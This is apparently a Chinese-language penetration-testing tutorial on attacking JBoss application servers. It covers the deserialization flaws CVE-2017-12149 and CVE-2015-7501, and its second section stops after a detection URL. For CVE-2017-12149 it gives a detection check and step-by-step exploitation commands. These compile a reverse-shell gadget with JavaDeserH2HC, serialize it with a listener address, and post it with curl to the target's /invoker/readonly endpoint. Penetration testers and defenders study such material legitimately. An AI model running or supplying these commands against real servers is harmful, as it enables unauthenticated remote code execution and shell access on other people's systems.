文章目录
一、Jboss简介
JBoss是一个基于J2EE的开发源代码的应用服务器,一般与Tomcat或Jetty绑定使用。默认端口:8080、9990。
二、Jboss渗透
2.1 JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)
JBOSS Application Server反序列化命令执行漏洞(CVE-2017-12149),远程攻击者利用漏洞可在未经任何身份验证的服务器主机上执行任意代码。
影响版本:JBoss 5.x/6.x。
1)验证是否存在该漏洞
访问:https://xxx/invoker/readonly
,返回500,则说明存在此漏洞。
2)漏洞利用
工具:JavaDeserH2HC
(1)生成ReverseShellCommonsCollectionsHashMap.class
javac -cp commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
(2)生成ReverseShellCommonsCollectionsHashMap.ser
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.253.9:8888
# ip是nc所在的ip
(3)利用Map.ser:
curl http://192.168.253.89:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
2.2 JBoss JMXInvokerServlet 反序列化漏洞(CVE-2015-7501)
由于JBoss中invoker/JMXInvokerServlet
路径对外开放,JBoss的jmx组件支持Java反序列化!
漏洞影响:
Red Hat JBoss A-MQ 6.x版本;BPM Suite (BPMS) 6.x版本;BRMS 6.x版本和5.x版本;Data Grid (JDG) 6.x版本;Data Virtualization (JDV) 6.x版本和5.x版本;Enterprise Application Platform 6.x版本,5.x版本和4.3.x版本;Fuse 6.x版本;Fuse Service Works (FSW) 6.x版本;Operations Network (JBoss ON) 3.x版本;Portal 6.x版本;SOA Platform (SOA-P) 5.x版本;Web Server (JWS) 3.x版本;Red Hat OpenShift/xPAAS 3.x版本;Red Hat Subscription Asset Manager 1.3版本。
1)验证漏洞
访问http://xxx/invoker/JMXInvokerServlet
,返回如下,说明接口开放,此接口存在反序列化漏洞。